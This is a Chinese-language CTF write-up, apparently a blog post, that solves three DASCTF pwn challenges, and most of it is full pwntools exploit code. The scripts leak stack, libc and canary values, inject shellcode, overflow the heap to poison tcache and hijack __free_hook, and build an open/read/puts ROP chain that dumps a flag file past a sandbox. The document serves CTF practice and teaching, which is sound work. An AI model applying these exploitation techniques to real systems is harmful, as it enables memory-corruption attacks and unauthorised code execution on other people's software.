
[复现]DASCTF Sept X 浙江工业大学秋季挑战赛-PWN


hehepwn

一开始泄露stack地址,然后写入shellcode并返回到shellcode执行

from pwn import *

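# --- hehepwn: environment -------------------------------------------------
# Written against Python 2 pwntools: the payload code below mixes str and
# bytes (bytes.ljust() with a str fill), which raises TypeError on Python 3.
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

# Local target. The commented-out env/ELF lines record the libc the author had
# at hand (2.27); this particular script uses no libc offsets.
p = process('./bypwn')#, env={"LD_PRELOAD":'./libc-2.27.so'})
#libc = ELF('./libc-2.27.so')
elf = ELF('./bypwn')


# Tube helpers as plain functions instead of assigned lambdas (PEP 8 E731).
# Semantics are unchanged: every send path still coerces through str(), which
# is also why these wrappers only behave with bytes payloads on Python 2.
def s(data):
    """Send str(data) with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for *delim*, then send str(data) with no trailing newline."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for *delim*, then send str(data) followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(num):
    """Receive up to *num* bytes from the tube."""
    return p.recv(num)


def ru(delims, drop=True):
    """Receive through *delims*; the delimiter is dropped unless drop=False."""
    return p.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the user (interactive mode)."""
    return p.interactive()


def uu32(data):
    """Unpack a 32-bit value (endianness per pwntools context), zero-padding to 4 bytes."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a 64-bit value (endianness per pwntools context), zero-padding to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    """Log *addr* as a hex value labelled *name*."""
    return log.success('{} = {:#x}'.format(name, addr))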

def debug():
	"""Attach gdb to the running target and pause the exploit until resumed."""
	gdb.attach(p)
	pause()

# Stage 1 - stack leak. The 0x1f 'a's are echoed back and the six bytes that
# follow are unpacked as a pointer (presumably an unterminated buffer running
# into a saved stack pointer -- confirm in gdb). 0x50 is the distance from
# that pointer to what is later used as the jump target; binary-specific.
pl = 'a'*0x1f
sla('well you input:\n',pl)
ru('a'*0x1f+'\n')
stack = uu64(r(6)) - 0x50
leak('stack',stack)
# Stage 2 - shellcode in the buffer, padded to 0x58, then the computed buffer
# address as the new return address. This only works with an executable
# stack and no canary on the target (checksec output is not shown on the page).
# Python 2 only: bytes.ljust() with a str fill raises TypeError on Python 3.
shellcode=asm(shellcraft.sh())
pl = shellcode
pl = pl.ljust(0x58,'\x00')
pl += p64(stack)
p.sendlineafter('EASY PWN PWN PWN~\n',pl)
itr()

image

datasystem

有一个登录的界面

image

看特征应该是md5的emmm

参考上一个文章的绕过方法,绕过login

image

这里找到了溢出点,有沙盒,就在有执行权限的地方写入shellcode,之后再打freehook调用shellcode

from pwn import *

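# --- datasystem: environment ----------------------------------------------
# Written against Python 2 pwntools: the payloads below concatenate str with
# p64() bytes, which raises TypeError on Python 3.
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

# Local target against the system libc. Every hard-coded libc constant further
# down (0x3EBCA0 and the gadget offsets) is bound to this exact build; the
# commented-out LD_PRELOAD shows the author expected glibc 2.27.
p = process('./datasystem')#, env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./datasystem')


# Tube helpers as plain functions instead of assigned lambdas (PEP 8 E731).
# Semantics are unchanged: every send path still coerces through str(), which
# is also why these wrappers only behave with bytes payloads on Python 2.
def s(data):
    """Send str(data) with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for *delim*, then send str(data) with no trailing newline."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for *delim*, then send str(data) followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(num):
    """Receive up to *num* bytes from the tube."""
    return p.recv(num)


def ru(delims, drop=True):
    """Receive through *delims*; the delimiter is dropped unless drop=False."""
    return p.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the user (interactive mode)."""
    return p.interactive()


def uu32(data):
    """Unpack a 32-bit value (endianness per pwntools context), zero-padding to 4 bytes."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a 64-bit value (endianness per pwntools context), zero-padding to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    """Log *addr* as a hex value labelled *name*."""
    return log.success('{} = {:#x}'.format(name, addr))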

def debug():
	"""Attach gdb to the running target and pause the exploit until resumed."""
	gdb.attach(p)
	pause()

def add(size, content):
    """Menu option 1: answer "Size:" with *size* and "Content:" with *content*."""
    for prompt, answer in ((">> :", 1), ("Size:", str(size))):
        sla(prompt, answer)
    sa("Content:", content)

def edit(idx, content):
    """Menu option 3: answer "Index:" with *idx* and "Content:" with *content*.

    Not called by the exploit in this file; note show() selects option 3 too.
    """
    for prompt, answer in ((">> :", 3), ("Index:", str(idx))):
        sla(prompt, answer)
    sa("Content:", content)

def delete(idx):
    """Menu option 2: answer "Index:" with *idx*."""
    answers = ((">> :", 2), ("Index:", str(idx)))
    for prompt, answer in answers:
        sla(prompt, answer)

def show(idx):
    """Select option 3 and answer "Index:" with *idx*; the caller reads the echoed content.

    NOTE(review): this sends the same option number as edit(); confirm against
    the binary's menu that 3 is the entry that prints a chunk.
    """
    answers = ((">> :", 3), ("Index:", str(idx)))
    for prompt, answer in answers:
        sla(prompt, answer)


# Login. The write-up says the check looks like MD5 and reuses the bypass from
# the previous post; why "gB" + 0x1e NUL bytes passes is not shown on this page.
sa("please input username: ", "admin")
sa("please input password: ", "gB" + '\x00' * 0x1e)

# Stage 1 - libc leak through the contents show() echoes back. The 0x430
# request is presumably sized to fall outside the tcache range so that freeing
# it leaves a libc pointer on the heap for the re-allocated chunk 0 to expose
# -- confirm in gdb.
add(0x10,'a'*0x10)#0
add(0x430, 'bpc')#1
add(0x10, 'bpc')#2
delete(1)
delete(0)
add(0x10, 0x20*'a')#0   # 0x20 bytes into a 0x10 request: the overflow noted in the write-up
show(0)
ru('a'*0x20)
# 0x3EBCA0 is the distance from the leaked pointer to the libc base for this
# exact libc build; any other build needs a different constant.
libcbase = uu64(r(6)) - 0x3EBCA0
leak('libcbase',libcbase)
# Of the addresses below only `free` (__free_hook) is used by this script; the
# rest are computed but never referenced and look like leftovers from the ROP
# template reused in the hahapwn exploit further down.
gg = libcbase + 0x15B066
opent = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
puts = libcbase + libc.sym['puts']
free = libcbase + libc.sym['__free_hook']
rdi = libcbase + 0x000000000002164f
rdx = libcbase + 0x0000000000001b96
rsi = libcbase + 0x0000000000023a6a

# Fixed address used as the shellcode destination. The write-up says a region
# with execute permission exists; presumably the binary maps this address
# itself -- confirm with vmmap. Without such a mapping this chain fails.
mmap = 0x23330000

# Stage 2 - heap grooming. Again 0x20 bytes go into a 0x10 request; the extra
# qwords (0, 0x441) land on the neighbouring chunk's metadata.
delete(0)
add(0x10, 0x10 * 'a' + p64(0) + p64(0x441))#0
add(0x40,'bpc')#1
add(0x40,'bpc')#3
add(0x40,'bpc')#4
delete(4)
delete(3)
delete(1)
# 0x58 bytes into a 0x40 request: the spill writes 0x51 and `mmap` over the
# freed neighbour, presumably so a later 0x40 request (#4 below) is served
# from `mmap` -- confirm in gdb.
add(0x40,0x40*'a'+p64(0) + p64(0x51) + p64(mmap))#1
add(0x40,'bpc')#3
# Stage 3 - shellcode for the sandboxed target: open("flag") (0x67616c66 is
# "flag" as little-endian bytes), read up to 0x100 bytes onto the stack,
# write them to fd 1, exit_group(0). If open fails it writes "fail"
# (0x6c696166) instead. Syscall numbers are amd64: 2/0/1/231.
shellcode = asm('''
	sub rsp, 0x800
	push 0x67616c66
	mov rdi, rsp
	xor esi, esi
	mov eax, 2
	syscall

	cmp eax, 0
	js failed

	mov edi, eax
	mov rsi, rsp
	mov edx, 0x100
	xor eax, eax
	syscall

	mov edx, eax
	mov rsi, rsp
	mov edi, 1
	mov eax, edi
	syscall

	jmp exit

	failed:
	push 0x6c696166
	mov edi, 1
	mov rsi, rsp
	mov edx, 4
	mov eax, edi
	syscall

	exit:
	xor edi, edi
	mov eax, 231
	syscall
	''')
add(0x40,shellcode)#4   # lands at `mmap` if the grooming above worked
add(0x40,'bpc')#5
add(0x40,'bpc')#6
add(0x40,'bpc')#7
delete(7)
delete(6)
delete(5)
# Stage 4 - same spill, this time aimed at __free_hook (the hook exists only
# in glibc < 2.34), then `mmap` is written into it. The final delete(6) calls
# free() -> hook -> shellcode, as the write-up describes.
add(0x40,0x40*'a'+p64(0) + p64(0x51) + p64(free))#5
add(0x40,'bpc')#6
add(0x40,p64(mmap))#7
delete(6)
#debug()
itr()

image

hahapwn

image

有沙盒

image

然后看welcome,有格式化字符串漏洞,还有一个栈溢出的漏洞

第一次格式化字符串漏洞leak stack、libc、canary,剩下的就是正常进行的orw了

from pwn import *

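# --- hahapwn: environment -------------------------------------------------
# Written against Python 2 pwntools: the payload below concatenates str with
# p64() bytes, which raises TypeError on Python 3.
context.os = 'linux'
context.log_level = "debug"
context.arch = 'amd64'

# Local target against the system libc. The hard-coded constants further down
# (0x61C710 and the pop-register gadget offsets) are bound to this exact
# build; the commented-out LD_PRELOAD shows the author expected glibc 2.27.
p = process('./pwn')#, env={"LD_PRELOAD":'./libc-2.27.so'})
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./pwn')


# Tube helpers as plain functions instead of assigned lambdas (PEP 8 E731).
# Semantics are unchanged: every send path still coerces through str(), which
# is also why these wrappers only behave with bytes payloads on Python 2.
def s(data):
    """Send str(data) with no trailing newline."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for *delim*, then send str(data) with no trailing newline."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send str(data) followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for *delim*, then send str(data) followed by a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(num):
    """Receive up to *num* bytes from the tube."""
    return p.recv(num)


def ru(delims, drop=True):
    """Receive through *delims*; the delimiter is dropped unless drop=False."""
    return p.recvuntil(delims, drop)


def itr():
    """Hand the tube over to the user (interactive mode)."""
    return p.interactive()


def uu32(data):
    """Unpack a 32-bit value (endianness per pwntools context), zero-padding to 4 bytes."""
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    """Unpack a 64-bit value (endianness per pwntools context), zero-padding to 8 bytes."""
    return u64(data.ljust(8, b'\x00'))


def leak(name, addr):
    """Log *addr* as a hex value labelled *name*."""
    return log.success('{} = {:#x}'.format(name, addr))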

def debug():
	"""Attach gdb to the running target and pause the exploit until resumed."""
	gdb.attach(p)
	pause()
# Stage 1 - format-string leak (the name is used as the printf format, the bug
# the write-up points out). %9$p, %12$p and %27$p print three stack slots that
# are used below as a libc pointer, a stack pointer and the canary.
# r(14) reads "0x" + 12 hex digits; r(18) reads "0x" + 16 hex digits.
pl = '%9$p-%12$p-%27$p'
sla('Welcome! What is your name?\n',pl)
ru('Hello \n')
# 0x61C710 and 0x20 are the distances from the leaked values to the libc base
# and to the address later used as the "./flag" pointer; both are specific to
# this libc build and binary.
libcbase = int(r(14),16) - 0x61C710
leak('libcbase',libcbase)
ru('-')
stack = int(r(14),16) - 0x20
leak('stack',stack)
ru('-')
canary = int(r(18),16)
leak('canary',canary)
# Symbols resolved from the loaded libc; the three raw offsets are gadgets
# (named for pop rdi / pop rsi / pop rdx) for that same build only.
opent = libcbase + libc.sym['open']
read = libcbase + libc.sym['read']
puts = libcbase + libc.sym['puts']
rdi = libcbase + 0x000000000002164f
rsi = libcbase + 0x0000000000023a6a
rdx = libcbase + 0x0000000000001b96
# Stage 2 - stack overflow with the leaked canary, then an open/read/puts
# chain (the write-up mentions a sandbox, hence no shell). Layout: "./flag"
# at the buffer start, NUL padding to 0x68, the canary, 8 bytes presumably
# overwriting the saved rbp, then the ROP chain.
# Python 2 only: p64() bytes are concatenated with str here.
pl = './flag\x00\x00'
pl = pl.ljust(0x68,'\x00')
pl += p64(canary)
pl += 'bcatbcat'
# open(stack, 0, 0) -- `stack` is expected to point at "./flag"
pl += p64(rdi) + p64(stack) + p64(rsi) + p64(0) + p64(rdx) + p64(0) + p64(opent)
# read(3, 0x601160, 0x30): fd 3 assumes no other descriptor was opened first;
# 0x601160 is presumably a writable address in the (non-PIE) binary -- confirm.
pl += p64(rdi) + p64(3) + p64(rsi) + p64(0x601160) + p64(rdx) + p64(0x30) + p64(read)
# puts(0x601160)
pl += p64(rdi) + p64(0x601160) + p64(puts)
p.sendlineafter('What can we help you?\n',pl)

#debug()

itr()

image

From: https://www.cnblogs.com/bpcat/p/16917324.html
